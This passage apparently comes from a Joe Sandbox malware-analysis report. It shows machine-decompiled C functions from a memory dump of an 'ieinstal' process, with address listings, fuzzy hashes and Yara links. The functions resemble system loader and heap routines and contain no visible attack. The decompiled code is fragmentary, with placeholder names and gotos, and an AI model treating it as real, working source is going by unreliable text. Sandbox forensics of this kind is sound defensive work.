								if(_t130 == 0) {
									_t130 = 0;
									__eflags = 0;
								} else {
									_t130 = _t130 ^ 0x1f0b67a4;
								}
							}
							_t213 = _t187 & 1;
							__eflags = _t130;
							if(_t130 == 0) {
								L32:
								_t211 = _t218;
							} else {
								do {
									_t41 = _t130 - 0x50; // 0x756e0000
									__eflags = _t167 -  *_t41;
									if(__eflags < 0) {
										_t207 =  *_t130;
										L27:
										__eflags = _t213;
										if(_t213 == 0) {
											L30:
											_t130 = _t207;
										} else {
											__eflags = _t207;
											if(_t207 == 0) {
												goto L30;
											} else {
												_t130 = _t130 ^ _t207;
											}
										}
										goto L31;
									} else {
										if(__eflags <= 0) {
											__eflags = _t130;
											if(_t130 == 0) {
												goto L32;
											} else {
												_t47 = _t130 - 0x18; // 0x3335918
												_t208 =  *_t47;
												_t48 = _t130 - 0x68; // 0x3335868
												_t211 = _t48;
												_v176 = _t211;
												__eflags =  *((intOrPtr*)(_t208 + 0xc)) - 0xffffffff;
												if( *((intOrPtr*)(_t208 + 0xc)) != 0xffffffff) {
													_t156 =  *_t208;
													__eflags =  *(_t156 - 0x20) & 0x00000020;
													if(( *(_t156 - 0x20) & 0x00000020) == 0) {
														asm("lock inc dword [edx+0x9c]");
														_t54 = _t211 + 0x50; // 0x3335918
														_t208 =  *_t54;
													}
												}
												_t55 = _t208 + 0x20; // 0x9
												_t224 =  *_t55;
												_v188 = _t224;
												goto L33;
											}
											goto L50;
										} else {
											_t42 = _t130 + 4; // 0x3333228
											_t207 =  *_t42;
											goto L27;
										}
									}
									goto L33;
									L31:
									__eflags = _t130;
								} while (_t130 != 0);
								goto L32;
							}
							L33:
							_t218 = 0x1f0b6668;
							asm("lock cmpxchg [edi], ecx");
							_t189 = 1;
							__eflags = 1 - 1;
							if(1 != 1) {
								while(1) {
									__eflags = _t189 & 0x00000004;
									if((_t189 & 0x00000004) != 0) {
										goto L43;
									}
									L36:
									__eflags = _t189 & 0x00000002;
									if((_t189 & 0x00000002) == 0) {
										goto L43;
									} else {
										_t218 = 3;
									}
									L44:
									_t215 = _t218 + _t189;
									_t154 = _t189;
									asm("lock cmpxchg [ebx], esi");
									__eflags = _t154 - _t189;
									if(_t154 != _t189) {
										_t189 = _t154;
										__eflags = _t189 & 0x00000004;
										if((_t189 & 0x00000004) != 0) {
											goto L43;
										}
										goto L44;
									}
									_t167 = _a4;
									__eflags = _t218 - 3;
									if(_t218 == 3) {
										__eflags = 0;
										E1EFF3BDB(0x1f0b6668, 0, _t215);
									}
									_t224 = _v188;
									_t211 = _v176;
									goto L49;
									L43:
									_t218 = _t218 | 0xffffffff;
									__eflags = _t218;
									goto L44;
								}
							}
							L49:
							_t177 = 0x1000;
						} else {
							_t211 =  *0x1f0b5d68; // 0x3332d38
							_v176 = _t211;
							_t36 = _t211 + 0x50; // 0x3332de8
							_t37 =  *_t36 + 0x20; // 0x9
							_t224 =  *_t37;
							_v188 = _t224;
						}
						L50:
						__eflags = _t211;
						if(_t211 == 0) {
							break;
						} else {
							_t132 =  *[fs:0x18];
							__eflags =  *(_t132 + 0xfca) & _t177;
							if(( *(_t132 + 0xfca) & _t177) != 0) {
								L56:
								_v192 = 0;
								_t133 = E1F0410DF(_v196,  &_v192, 0);
								_t218 = _v176;
								__eflags = _t133;
								_t211 = _t218;
								_v192 = (_t133 < 0x00000000) - 0x00000001 & _v192;
								_t135 = E1F016039((_t133 < 0x00000000) - 0x00000001 & _v192, _t218, _v172, _v208, 1,  &_v180);
								_t195 = _v192;
								_t170 = _t135;
								__eflags = _v192;
								if(_v192 != 0) {
									E1EFDD3E1(_t170, _t195, _t224);
								}
								__eflags = _t170;
								if(_t170 >= 0) {
									__eflags = _t224 - 7;
									if(_t224 == 7) {
										__eflags = _a20;
										if(_a20 == 0) {
											_t146 =  *[fs:0x18];
											__eflags =  *(_t146 + 0xfca) & 0x00001000;
											if(( *(_t146 + 0xfca) & 0x00001000) != 0) {
												_t147 = E1EFE2180(0x1f0b32d8);
												__eflags = _t147;
												if(_t147 == 0) {
													_t211 = 0;
													__eflags = 0;
													_v181 = _t147;
													_t170 = E1EFE1934( *((intOrPtr*)(_t218 + 0x50)), 0,  &_v181);
												}
											}
										}
									}
									__eflags = _t170;
									if(_t170 >= 0) {
										__eflags =  *0x1f0b9230;
										_t224 = _v196;
										if(__eflags != 0) {
											_t211 =  *(_t218 + 0x18);
											E1F048514(_t224,  *(_t218 + 0x18), __eflags, _v180, 0,  &_v180);
										}
										__eflags =  *0x1f0b65f0;
										if( *0x1f0b65f0 != 0) {
											_t228 =  *0x1f0b91f0; // 0x0
											_v204 = 0;
											_t211 =  *0x7ffe0330;
											asm("ror esi, cl");
											_t224 = _t228 ^  *0x7ffe0330;
											 *0x1f0b91e0( &_v204, _t218, _v180, 0, _t224);
											 *(_t228 ^  *0x7ffe0330)();
											_t143 = _v204;
											__eflags = _t143;
											if(_t143 != 0) {
												_v180 = _t143;
											}
										}
									} else {
										_v180 = 0;
									}
								}
								__eflags = _t170 - 0xc0000135;
								if(_t170 == 0xc0000135) {
									L73:
									_t168 = 0xc000007a;
								} else {
									__eflags = _t170 - 0xc0000142;
									if(_t170 == 0xc0000142) {
										goto L73;
									}
								}
								E1EFDD3E1(_t168, _t218, _t224);
								__eflags = _t168 - 0xc000007a;
								if(_t168 != 0xc000007a) {
									goto L79;
								} else {
									_t225 = _v172;
									__eflags = _t225;
									if(_t225 == 0) {
										_t225 = _v208;
									}
									_t211 = _t225;
									__eflags = _v212;
									_t168 = (0 | _v212 != 0x00000000) + 0xc0000138;
									_push(_t168);
									E1EFF9F93(_t168, 0, _t225);
								}
							} else {
								__eflags = _t224 - _v200;
								if(_t224 >= _v200) {
									goto L56;
								} else {
									E1EFDD3E1(_t167, _t211, _t224);
									__eflags = _t224;
									if(_t224 < 0) {
										_t168 = 0xc000000d;
										L79:
										_t225 = _v172;
									} else {
										E1EFE19DF(0);
										_t118 = E1EFF79F9();
										continue;
									}
								}
							}
						}
						__eflags = _v165;
						if(_v165 != 0) {
							E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t225);
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							_t122 =  *0x1f0b9300; // 0xcd0000
							__eflags = _t122 |  *0x1f0b9304;
							if((_t122 |  *0x1f0b9304) != 0) {
								__eflags =  *0x1f0b92e4 & 0x00000001;
								if(( *0x1f0b92e4 & 0x00000001) == 0) {
									_t181 =  *0x1f0b92ec; // 0x100
									__eflags = (_t181 >> 0x00000008 & 0x00000003) - 3;
									if((_t181 >> 0x00000008 & 0x00000003) == 3) {
										_t211 =  &_v216;
										_t124 = E1F073CD0(_v180,  &_v216, _t218);
										__eflags = _t124 - 1;
										if(_t124 != 1) {
											__eflags = _v216 & 0x00000010;
											if((_v216 & 0x00000010) != 0) {
												_t211 = 4;
												_t168 = E1F073C53(4,  &_v224);
												__eflags = _t168;
												if(_t168 < 0) {
													asm("int 0x29");
												}
											}
										}
									}
								}
							}
						}
						_pop(_t219);
						_pop(_t226);
						 *_v220 = _v180;
						__eflags = _v8 ^ _t231;
						_pop(_t169);
						return E1F004B50(_t168, _t169, _v8 ^ _t231, _t211, _t219, _t226);
						goto L91;
					}
					_t168 = 0xc0000135;
					goto L79;
				} else {
					_t174 =  *_t223 & 0x0000ffff;
					_t16 = _t174 + 1; // 0x1
					_t220 = _t16;
					if((_t223[1] & 0x0000ffff) < _t220) {
						L6:
						if(_t220 <= 0x80) {
							_t158 =  &_v140;
							_v172 =  &_v140;
							L11:
							E1F0088C0(_t158, _t223[2], _t174);
							_t118 = _v172;
							 *((char*)(_t118 + _t220 - 1)) = 0;
							goto L13;
						} else {
							_t160 =  *0x1f0b5d78; // 0x0
							_t158 = E1EFD5D90(_t176,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t160 + 0x180000, _t220);
							_v172 = _t158;
							if(_t158 != 0) {
								_v165 = 1;
								goto L11;
							} else {
								_pop(_t221);
								_pop(_t230);
								_pop(_t175);
								return E1F004B50(0xc000009a, _t175, _v8 ^ _t231, _t211, _t221, _t230);
							}
						}
					} else {
						_t118 = _t223[2];
						_v172 = _t118;
						if( *((char*)(_t174 + _t118)) == 0) {
							goto L13;
						} else {
							goto L6;
						}
					}
				}
				L91:
			}

0x1efdcf00
0x1efdcf00
0x1efdcf12
0x1efdcf15
0x1efdcf15
0x1efdcf1d
0x1efdcf27
0x1efdcf2a
0x1efdcf34
0x1efdcf3a
0x1efdcf44
0x1efdcf4b
0x1efdcf65
0x1efdcf65
0x1efdcf4d
0x1efdcf52
0x1efdcf57
0x1efdcf63
0x00000000
0x00000000
0x1efdcf63
0x1efdcf71
0x1efdd007
0x1efdd007
0x1efdd009
0x1efdd00f
0x1efdd00f
0x1efdd012
0x1efdd018
0x1efdd01e
0x1efdd01e
0x1efdd020
0x1efdd025
0x1efdd02b
0x1efdd02d
0x00000000
0x00000000
0x1efdd033
0x1efdd039
0x1efdd05d
0x1efdd062
0x1efdd068
0x1efdd06d
0x1efdd070
0x1efdd072
0x1efdd074
0x1efdd07d
0x1efdd07d
0x1efdd076
0x1efdd076
0x1efdd076
0x1efdd074
0x1efdd082
0x1efdd085
0x1efdd087
0x1efdd0b0
0x1efdd0b0
0x1efdd090
0x1efdd090
0x1efdd090
0x1efdd090
0x1efdd093
0x1efdd09c
0x1efdd09e
0x1efdd09e
0x1efdd0a0
0x1efdd0aa
0x1efdd0aa
0x1efdd0a2
0x1efdd0a2
0x1efdd0a4
0x00000000
0x1efdd0a6
0x1efdd0a6
0x1efdd0a6
0x1efdd0a4
0x00000000
0x1efdd095
0x1efdd095
0x1efdd0e1
0x1efdd0e3
0x00000000
0x1efdd0e5
0x1efdd0e5
0x1efdd0e5
0x1efdd0e8
0x1efdd0e8
0x1efdd0eb
0x1efdd0f1
0x1efdd0f5
0x1efdd0f7
0x1efdd0f9
0x1efdd0fd
0x1efdd0ff
0x1efdd106
0x1efdd106
0x1efdd106
0x1efdd0fd
0x1efdd109
0x1efdd109
0x1efdd10c
0x00000000
0x1efdd10c
0x00000000
0x1efdd097
0x1efdd097
0x1efdd097
0x00000000
0x1efdd097
0x1efdd095
0x00000000
0x1efdd0ac
0x1efdd0ac
0x1efdd0ac
0x00000000
0x1efdd090
0x1efdd0b2
0x1efdd0b9
0x1efdd0be
0x1efdd0c2
0x1efdd0c4
0x1efdd0c7
0x1efdd0d0
0x1efdd0d0
0x1efdd0d3
0x00000000
0x00000000
0x1efdd0d5
0x1efdd0d5
0x1efdd0d8
0x00000000
0x1efdd0da
0x1efdd0da
0x1efdd0da
0x1efdd117
0x1efdd117
0x1efdd11a
0x1efdd11e
0x1efdd122
0x1efdd124
0x1efdd126
0x1efdd0d0
0x1efdd0d3
0x00000000
0x00000000
0x00000000
0x1efdd0d3
0x1efdd12a
0x1efdd12d
0x1efdd130
0x1efdd133
0x1efdd13a
0x1efdd13a
0x1efdd13f
0x1efdd145
0x00000000
0x1efdd114
0x1efdd114
0x1efdd114
0x00000000
0x1efdd114
0x1efdd0d0
0x1efdd14b
0x1efdd14b
0x1efdd03b
0x1efdd03b
0x1efdd041
0x1efdd047
0x1efdd04a
0x1efdd04a
0x1efdd04d
0x1efdd04d
0x1efdd150
0x1efdd150
0x1efdd152
0x00000000
0x1efdd158
0x1efdd158
0x1efdd15e
0x1efdd165
0x1efdd195
0x1efdd1a3
0x1efdd1ad
0x1efdd1b2
0x1efdd1ba
0x1efdd1bc
0x1efdd1dd
0x1efdd1e3
0x1efdd1e8
0x1efdd1ee
0x1efdd1f0
0x1efdd1f2
0x1efdd1f4
0x1efdd1f4
0x1efdd1f9
0x1efdd1fb
0x1efdd201
0x1efdd204
0x1efdd206
0x1efdd20a
0x1efdd20c
0x1efdd217
0x1efdd21e
0x1efdd225
0x1efdd22a
0x1efdd22c
0x1efdd231
0x1efdd231
0x1efdd233
0x1efdd245
0x1efdd245
0x1efdd22c
0x1efdd21e
0x1efdd20a
0x1efdd247
0x1efdd249
0x1efdd25a
0x1efdd261
0x1efdd267
0x1efdd269
0x1efdd27d
0x1efdd27d
0x1efdd282
0x1efdd289
0x1efdd28c
0x1efdd2a0
0x1efdd2af
0x1efdd2be
0x1efdd2c0
0x1efdd2c4
0x1efdd2ca
0x1efdd2cc
0x1efdd2d2
0x1efdd2d4
0x1efdd2d6
0x1efdd2d6
0x1efdd2d4
0x1efdd24b
0x1efdd24b
0x1efdd24b
0x1efdd249
0x1efdd2dc
0x1efdd2e2
0x1efdd2ec
0x1efdd2ec
0x1efdd2e4
0x1efdd2e4
0x1efdd2ea
0x00000000
0x00000000
0x1efdd2ea
0x1efdd2f3
0x1efdd2f8
0x1efdd2fe
0x00000000
0x1efdd300
0x1efdd300
0x1efdd306
0x1efdd308
0x1efdd30a
0x1efdd30a
0x1efdd312
0x1efdd314
0x1efdd31f
0x1efdd325
0x1efdd326
0x1efdd326
0x1efdd167
0x1efdd167
0x1efdd16d
0x00000000
0x1efdd16f
0x1efdd171
0x1efdd176
0x1efdd178
0x1efdd18b
0x1efdd332
0x1efdd332
0x1efdd17a
0x1efdd17c
0x1efdd181
0x00000000
0x1efdd181
0x1efdd178
0x1efdd16d
0x1efdd165
0x1efdd338
0x1efdd33f
0x1efdd34d
0x1efdd34d
0x1efdd352
0x1efdd354
0x1efdd356
0x1efdd35b
0x1efdd361
0x1efdd363
0x1efdd36a
0x1efdd36c
0x1efdd378
0x1efdd37b
0x1efdd383
0x1efdd38b
0x1efdd390
0x1efdd393
0x1efdd395
0x1efdd39c
0x1efdd3a4
0x1efdd3b1
0x1efdd3b3
0x1efdd3b5
0x1efdd3bc
0x1efdd3bc
0x1efdd3b5
0x1efdd39c
0x1efdd393
0x1efdd37b
0x1efdd36a
0x1efdd361
0x1efdd3ca
0x1efdd3cb
0x1efdd3cc
0x1efdd3d3
0x1efdd3d5
0x1efdd3de
0x00000000
0x1efdd3de
0x1efdd32d
0x00000000
0x1efdcf77
0x1efdcf77
0x1efdcf7e
0x1efdcf7e
0x1efdcf83
0x1efdcf94
0x1efdcf9a
0x1efdcfe1
0x1efdcfe7
0x1efdcfed
0x1efdcff2
0x1efdcff7
0x1efdd000
0x00000000
0x1efdcf9c
0x1efdcf9c
0x1efdcfb1
0x1efdcfb6
0x1efdcfbe
0x1efdcfd8
0x00000000
0x1efdcfc0
0x1efdcfc5
0x1efdcfc6
0x1efdcfc7
0x1efdcfd5
0x1efdcfd5
0x1efdcfbe
0x1efdcf85
0x1efdcf85
0x1efdcf88
0x1efdcf92
0x00000000
0x00000000
0x00000000
0x00000000
0x1efdcf92
0x1efdcf83
0x00000000

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d84c146c2e193ee5470a63f94584c4a55d6d4e3b6ee1a08c1e1e1860c12db62
Instruction ID: 7b3e029b21d70da8f6d58083039ae39c8861b8af5072a2d87d78baefe1a51ffa
Opcode Fuzzy Hash: 1d84c146c2e193ee5470a63f94584c4a55d6d4e3b6ee1a08c1e1e1860c12db62
Instruction Fuzzy Hash: 95D1D735B003598FEB24CB55C8B0B99BBB6FB85304F094799DC09A7284D736AD89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 1F047EC3 Relevance: .3, Instructions: 322
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1F047EC3(void* __ecx, signed int __edx, intOrPtr _a4, char _a8) {
				char _v8;
				signed short* _v12;
				signed short* _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _t125;
				signed short* _t180;
				intOrPtr _t194;
				intOrPtr* _t198;
				char _t200;
				char _t205;
				signed int _t207;
				signed int _t215;
				signed int _t218;
				signed int* _t221;
				void* _t225;
				signed int _t226;
				signed int _t230;
				signed short* _t249;
				signed short* _t254;
				char _t259;
				void* _t260;
				signed short* _t261;

				_t195 = __ecx;
				_t260 = __ecx;
				_v20 = __edx;
				if( *((intOrPtr*)(__ecx + 0x38)) != 0 ||  *((intOrPtr*)(__ecx + 0x30)) != 0 ||  *((intOrPtr*)(__ecx + 0x3c)) != 0 ||  *((intOrPtr*)(__ecx + 0x48)) != 0) {
					_t259 = _a8;
					if(_t259 != 0) {
						_t125 = E1EFD5D90(_t195,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t259 + 0x0000001f >> 0x00000003 & 0x1ffffffc);
						_v24 = _t125;
						if(_t125 != 0) {
							_t194 = _a4;
							_v32 = _t259;
							_v28 = _t125;
							if( *(_t260 + 0x38) == 0) {
								L25:
								_t235 =  *(_t260 + 0x30);
								_v16 = _t235;
								if(_t235 == 0) {
									L36:
									if( *(_t260 + 0x3c) == 0) {
										L40:
										if( *((intOrPtr*)(_t260 + 0x34)) == 0) {
											L44:
											if( *((intOrPtr*)(_t260 + 0x48)) == 0) {
												L48:
												_t261 = 0;
												L49:
												E1EFD3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v24);
												goto L50;
											}
											if(E1F047DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x48)), 8,  &_v32) == 0) {
												L11:
												_t261 = 0xc0000001;
												goto L49;
											}
											_t198 =  *((intOrPtr*)(_t260 + 0x48));
											_t130 =  *_t198;
											if( *_t198 < 8) {
												goto L11;
											}
											_t117 = _t198 + 8; // 0x8
											if(E1F047DD0(_t194, _t259, _t117, _t130 + 0xfffffff8,  &_v32) == 0) {
												goto L11;
											}
											goto L48;
										}
										_t200 = 0x10;
										_v8 = _t200;
										if(E1F047DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x34)), _t200,  &_v32) == 0 || E1EFF4CF8( &_v8,  *( *((intOrPtr*)(_t260 + 0x34)) + 0xc) * 0x8c,  *( *((intOrPtr*)(_t260 + 0x34)) + 0xc) * 0x8c >> 0x20) < 0 || E1F047DD0(_t194, _t259,  *((intOrPtr*)(_t260 + 0x34)) + 0x10, _v8,  &_v32) == 0) {
											goto L11;
										} else {
											goto L44;
										}
									}
									_t205 = 4;
									_v8 = _t205;
									if(E1F047DD0(_t194, _t259,  *(_t260 + 0x3c), _t205,  &_v32) == 0) {
										goto L11;
									}
									_t207 = 0x24;
									if(E1EFF4CF8( &_v8,  *( *(_t260 + 0x3c)) * _t207,  *( *(_t260 + 0x3c)) * _t207 >> 0x20) < 0 || E1F047DD0(_t194, _t259,  &(( *(_t260 + 0x3c))[1]), _v8,  &_v32) == 0) {
										goto L11;
									} else {
										goto L40;
									}
								}
								if((_v20 & 0x00000100) == 0) {
									_v8 = 4;
									if(E1F047DD0(_t194, _t259, _t235, 4,  &_v32) == 0 || E1EFF4CF8( &_v8,  *( *(_t260 + 0x30)) * 0x11c,  *( *(_t260 + 0x30)) * 0x11c >> 0x20) < 0 || E1F047DD0(_t194, _t259,  &(( *(_t260 + 0x30))[1]), _v8,  &_v32) == 0) {
										goto L11;
									} else {
										goto L36;
									}
								}
								while(E1F047DD0(_t194, _t259, _t235, 2,  &_v32) != 0) {
									_t249 = _v16;
									if( *_t249 == 0) {
										L31:
										_t215 =  *_t249 & 0x0000ffff;
										_t235 = _t249 + _t215;
										_v16 = _t249 + _t215;
										if(_t215 != 0) {
											continue;
										}
										goto L36;
									}
									if(E1F047DD0(_t194, _t259,  &(_t249[1]), 0x12a,  &_v32) == 0) {
										goto L11;
									}
									_t249 = _v16;
									goto L31;
								}
								goto L11;
							}
							_v8 = 4;
							if(E1F047DD0(_t194, _t259,  *(_t260 + 0x38), 4,  &_v32) != 0) {
								_t218 = 0x40;
								if(E1EFF4CF8( &_v8,  *( *(_t260 + 0x38)) * _t218,  *( *(_t260 + 0x38)) * _t218 >> 0x20) < 0 || E1F047DD0(_t194, _t259,  &(( *(_t260 + 0x38))[1]), _v8,  &_v32) == 0) {
									goto L11;
								} else {
									_t221 =  *(_t260 + 0x38);
									_t180 = 0;
									_t254 = 0;
									_v16 = 0;
									if( *_t221 <= 0) {
										goto L25;
									}
									_v12 = 0;
									do {
										_t222 =  *(_t180 +  &(_t221[7]));
										if( *(_t180 +  &(_t221[7])) == 0) {
											L20:
											_t224 =  *(_t180 +  &(( *(_t260 + 0x38))[6]));
											if( *(_t180 +  &(( *(_t260 + 0x38))[6])) == 0) {
												goto L24;
											}
											_t226 = 0x40;
											if(E1EFF4CF8( &_v8, _t224 * _t226, _t224 * _t226 >> 0x20) < 0 || E1F047DD0(_t194, _t259,  *((intOrPtr*)(_v12 +  &(( *(_t260 + 0x38))[0xf]))), _v8,  &_v32) == 0) {
												goto L11;
											} else {
												_t180 = _v12;
												_t254 = _v16;
												goto L24;
											}
										}
										_t230 = 0x10;
										if(E1EFF4CF8( &_v8, _t222 * _t230, _t222 * _t230 >> 0x20) < 0 || E1F047DD0(_t194, _t259,  *((intOrPtr*)(_v12 +  &(( *(_t260 + 0x38))[0x10]))), _v8,  &_v32) == 0) {
											goto L11;
										} else {
											_t180 = _v12;
											_t254 = _v16;
											goto L20;
										}
										L24:
										_t225 = 0x40;
										_t180 = _t180 + _t225;
										_t254 =  &(_t254[0]);
										_t221 =  *(_t260 + 0x38);
										_v16 = _t254;
										_v12 = _t180;
									} while (_t254 <  *_t221);
									goto L25;
								}
							}
							goto L11;
						}
						return 0xc000009a;
					}
					_t261 = 0xc0000001;
					goto L50;
				} else {
					_t261 = 0;
					L50:
					return _t261;
				}
			}

0x1f047ec3
0x1f047ecd
0x1f047ecf
0x1f047ed8
0x1f047ef0
0x1f047ef5
0x1f047f18
0x1f047f1d
0x1f047f22
0x1f047f32
0x1f047f35
0x1f047f38
0x1f047f3b
0x1f048058
0x1f048058
0x1f04805b
0x1f048060
0x1f04811d
0x1f048121
0x1f04817d
0x1f048181
0x1f0481e0
0x1f0481e4
0x1f04822b
0x1f04822b
0x1f04822d
0x1f04823c
0x00000000
0x1f04823c
0x1f0481fa
0x1f047f5e
0x1f047f5e
0x00000000
0x1f047f5e
0x1f048200
0x1f048203
0x1f048208
0x00000000
0x00000000
0x1f048216
0x1f048225
0x00000000
0x00000000
0x00000000
0x1f048225
0x1f048185
0x1f048189
0x1f04819c
0x00000000
0x00000000
0x00000000
0x00000000
0x1f04819c
0x1f048125
0x1f048129
0x1f04813c
0x00000000
0x00000000
0x1f048147
0x1f048158
0x00000000
0x00000000
0x00000000
0x00000000
0x1f048158
0x1f04806d
0x1f0480c4
0x1f0480da
0x00000000
0x00000000
0x00000000
0x00000000
0x1f0480da
0x1f04806f
0x1f048087
0x1f04808f
0x1f0480b2
0x1f0480b2
0x1f0480b5
0x1f0480b7
0x1f0480bd
0x00000000
0x00000000
0x00000000
0x1f0480bf
0x1f0480a9
0x00000000
0x00000000
0x1f0480af
0x00000000
0x1f0480af
0x00000000
0x1f04806f
0x1f047f44
0x1f047f5c
0x1f047f6d
0x1f047f7e
0x00000000
0x1f047f9b
0x1f047f9b
0x1f047f9e
0x1f047fa0
0x1f047fa2
0x1f047fa7
0x00000000
0x00000000
0x1f047fad
0x1f047fb0
0x1f047fb0
0x1f047fb6
0x1f047ff5
0x1f047ff8
0x1f047ffe
0x00000000
0x00000000
0x1f048004
0x1f048013
0x00000000
0x1f04803b
0x1f04803b
0x1f04803e
0x00000000
0x1f04803e
0x1f048013
0x1f047fbc
0x1f047fcb
0x00000000
0x1f047fef
0x1f047fef
0x1f047ff2
0x00000000
0x1f047ff2
0x1f048041
0x1f048043
0x1f048044
0x1f048046
0x1f048047
0x1f04804a
0x1f04804d
0x1f048050
0x00000000
0x1f047fb0
0x1f047f7e
0x00000000
0x1f047f5c
0x00000000
0x1f047f24
0x1f047ef7
0x00000000
0x1f047ee9
0x1f047ee9
0x1f048241
0x00000000
0x1f048241

Memory Dump Source

Source File: 0000001B.00000002.1993935132.000000001EF90000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EF90000, based on PE: true

Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ba5b9f8610eb304a18b85e88e5207c24ca6e5808f40511664fe3833c6a2461
Instruction ID: 0fadf5f14a26010c3cb2bb91b50bde9ce3d42371cd29774f06200bbe65bf6133
Opcode Fuzzy Hash: 82ba5b9f8610eb304a18b85e88e5207c24ca6e5808f40511664fe3833c6a2461
Instruction Fuzzy Hash: 29B17375B00205AFDB24CE65C940BAFB7FAEF84304F20487EA946AB691E735F945CB10

Uniqueness

Uniqueness Score: -1.00%

Function 1EFE0D01 Relevance: .3, Instructions: 295
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E1EFE0D01(intOrPtr __ecx) {
				signed int _t134;
				signed int _t140;
				signed int _t142;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t160;
				signed int _t162;
				signed int _t164;
				signed int _t168;
				signed int _t170;
				void* _t192;
				signed int _t195;
				intOrPtr _t196;
				signed int _t202;
				void* _t203;
				signed int _t206;
				signed int _t208;
				signed int _t212;
				signed int _t216;
				intOrPtr _t217;
				signed int _t220;
				void* _t223;
				signed int _t226;
				signed int _t228;
				intOrPtr _t230;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t237;
				signed int _t240;
				void* _t242;
				void* _t245;
				void* _t247;

				_push(0x70);
				_push(0x1f09c3f8);
				E1F017C40(_t192, _t237, _t242);
				 *((intOrPtr*)(_t245 - 0x68)) = __ecx;
				if( *0x1f0b5c80 == 0) {
					L4:
					_t134 = 0;
					goto L5;
				} else {
					if(E1EFCE4B0( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t245 - 0x58, _t245 - 0x54) < 0) {
						 *((intOrPtr*)(_t245 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t245 - 0x54)) != 0) {
						_t194 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
						 *((intOrPtr*)(_t245 - 0x48)) =  *((intOrPtr*)( *[fs:0x30] + 0x18));
						 *(_t245 - 0x64) = 0;
						 *(_t245 - 0x6c) = 0;
						 *(_t245 - 0x5c) = 0;
						L1EFD2330( *[fs:0x30], 0x1f0b6718);
						_t140 =  *0x1f0b5c80; // 0x7
						__eflags = _t140 - 1;
						if(__eflags != 0) {
							_t202 = 0xc;
							_t203 = _t245 - 0x40;
							_t142 = E1EFF4CF8(_t203, _t140 * _t202, _t140 * _t202 >> 0x20);
							 *(_t245 - 0x44) = _t142;
							__eflags = _t142;
							if(_t142 < 0) {
								L50:
								E1EFD24D0(0x1f0b6718);
								_t134 =  *(_t245 - 0x44);
								L5:
								 *[fs:0x0] =  *((intOrPtr*)(_t245 - 0x10));
								return _t134;
							}
							_push(_t203);
							_t223 = 0x10;
							_t204 =  *(_t245 - 0x40);
							_t145 = E1EFB94A3( *(_t245 - 0x40), _t223);
							 *(_t245 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x1f0b5d78; // 0x0
							_t240 = E1EFD5D90(_t204, _t194, _t146 + 0xc0000,  *(_t245 - 0x40));
							 *(_t245 - 0x5c) = _t240;
							__eflags = _t240;
							if(_t240 == 0) {
								_t149 = 0xc0000017;
								 *(_t245 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t245 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t245 - 0x60) = _t240;
								_t150 =  *0x1f0b5c90; // 0x10
								 *(_t245 - 0x4c) = _t150;
								_push(_t245 - 0x74);
								_push(_t245 - 0x39);
								_push(_t245 - 0x58);
								_t195 = E1EFF1796(_t194,  *((intOrPtr*)(_t245 - 0x54)),  *((intOrPtr*)(_t245 - 0x68)), _t240, 0, __eflags);
								 *(_t245 - 0x44) = _t195;
								__eflags = _t195;
								if(_t195 < 0) {
									L30:
									E1EFD24D0(0x1f0b6718);
									__eflags = _t240 - _t245 - 0x38;
									if(_t240 != _t245 - 0x38) {
										_t241 =  *((intOrPtr*)(_t245 - 0x48));
										E1EFD3BC0( *((intOrPtr*)(_t245 - 0x48)), 0, _t240);
									} else {
										_t241 =  *((intOrPtr*)(_t245 - 0x48));
									}
									__eflags =  *(_t245 - 0x6c);
									if( *(_t245 - 0x6c) != 0) {
										E1EFD3BC0(_t241, 0,  *(_t245 - 0x6c));
									}
									__eflags = _t195;
									if(_t195 >= 0) {
										goto L4;
									} else {
										_t134 = _t195;
										goto L5;
									}
								}
								_t206 =  *0x1f0b5c80; // 0x7
								 *(_t240 + 8) = _t206;
								__eflags =  *((char*)(_t245 - 0x39));
								if( *((char*)(_t245 - 0x39)) != 0) {
									 *((intOrPtr*)(_t240 + 4)) = 1;
									 *(_t240 + 0xc) =  *(_t245 - 0x4c);
									_t160 =  *0x1f0b5c90; // 0x10
									 *(_t245 - 0x4c) = _t160;
								} else {
									 *((intOrPtr*)(_t240 + 4)) = 0;
									 *(_t240 + 0xc) =  *(_t245 - 0x58);
								}
								 *((intOrPtr*)(_t245 - 0x54)) = E1EFF1715( *((intOrPtr*)(_t245 - 0x74)), _t245 - 0x70);
								_t226 = 0;
								 *(_t245 - 0x40) = 0;
								 *(_t245 - 0x50) = 0;
								while(1) {
